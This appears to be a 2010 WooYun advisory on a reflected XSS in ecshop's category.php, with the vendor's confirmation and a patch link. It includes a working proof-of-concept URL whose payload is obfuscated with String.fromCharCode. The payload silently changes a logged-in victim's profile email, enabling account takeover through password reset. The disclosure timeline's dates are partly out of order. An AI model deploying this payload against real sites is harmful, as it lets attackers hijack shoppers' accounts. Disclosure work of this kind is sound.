当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2010-0401

漏洞标题:"ecshop修改任意用户密码漏洞"的XSS利用

相关厂商:ShopEx

漏洞作者: blue

提交时间:2010-09-02 20:17

修复时间:2010-10-02 21:00

公开时间:2010-10-02 21:00

漏洞类型:xss跨站脚本攻击

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2010-09-02: 细节已通知厂商并且等待厂商处理中
2010-09-03: 厂商已经确认,细节仅向厂商公开
2010-09-06: 细节向第三方安全合作伙伴开放
2010-10-28: 细节向核心白帽子及相关领域专家公开
2010-11-07: 细节向普通白帽子公开
2010-11-17: 细节向实习白帽子公开
2010-10-02: 细节向公众公开

简要描述:

目前ecshop存在反射型XSS,可利用,如果二次开发存在XSS或其它CSRF问题,则利用更多。(曾遇此问题,略受其害)

详细说明:

通过XSS构造post提交个人资料修改,修改为可操作的邮箱,然后密码找回。

漏洞证明:

http://localhost/test/ecshop_gbk272/category.php?id=3&price_min=0&price_max=0&filter_attr=0.0.0.199%22%3E%3Cscript%3Eeval%28String.fromCharCode%28120,61,110,101,119,32,88,77,76,72,116,116,112,82,101,113,117,101,115,116,40,41,59,120,46,111,112,101,110,40,34,112,111,115,116,34,44,34,104,116,116,112,58,47,47,108,111,99,97,108,104,111,115,116,47,116,101,115,116,47,101,99,115,104,111,112,95,103,98,107,50,55,50,47,117,115,101,114,46,112,104,112,34,41,59,120,46,115,101,116,82,101,113,117,101,115,116,72,101,97,100,101,114,40,34,67,111,110,116,101,110,116,45,84,121,112,101,34,44,34,97,112,112,108,105,99,97,116,105,111,110,47,120,45,119,119,119,45,102,111,114,109,45,117,114,108,101,110,99,111,100,101,100,34,41,59,120,46,115,101,110,100,40,34,97,99,116,61,97,99,116,95,101,100,105,116,95,112,114,111,102,105,108,101,38,101,109,97,105,108,61,120,120,120,64,49,54,51,46,99,111,109,34,41,59%29%29%3C/script%3E%3C%22


当然,以文件包含的方式利用更简洁

修复方案:

见:http://www.wooyun.org/bug.php?action=view&id=395

版权声明:转载请注明来源 blue@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:8

确认时间:2010-09-03 13:43

厂商回复:

过滤不严,正在修复。

最新状态:

2010-09-03:补丁已经发布补丁下载地址: http://bbs.ecshop.com/thread-137475-1-2.html

2010-09-06:对url进行编码和解码,去除没有必要的参数